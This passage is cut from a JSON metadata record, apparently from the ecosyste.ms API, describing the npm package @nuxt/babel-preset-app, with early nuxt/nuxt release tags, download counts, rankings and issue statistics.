pi/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:25:46.758Z","dependent_packages_count":23,"downloads":597856,"downloads_period":"last-month","dependent_repos_count":56820,"rankings":{"downloads":0.24239558769446057,"dependent_repos_count":0.12612749380496371,"dependent_packages_count":1.0547403372424038,"stargazers_count":0.15447521562107158,"forks_count":0.5200789827399681,"docker_downloads_count":0.43739883261343837,"average":0.42253607495271767},"purl":"pkg:npm/%40nuxt/babel-preset-app","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/babel-preset-app","docker_dependents_count":253,"docker_downloads_count":1373618,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/babel-preset-app","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/babel-preset-app/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://is